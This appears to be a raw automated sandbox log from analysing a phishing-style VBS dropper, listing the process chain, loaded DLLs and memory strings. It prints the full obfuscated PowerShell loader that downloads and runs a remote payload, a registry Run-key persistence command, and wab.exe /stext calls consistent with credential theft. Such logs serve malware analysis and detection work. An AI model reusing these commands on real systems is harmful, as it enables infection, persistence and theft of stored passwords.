Source: wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 0000000D.00000003.2478706827.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2479616088.00000000009D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\aywoauvyhwlgrptelemijrt"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cajhaffzuedltvhiuphbmeobpae"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\aywoauvyhwlgrptelemijrt" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cajhaffzuedltvhiuphbmeobpae" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
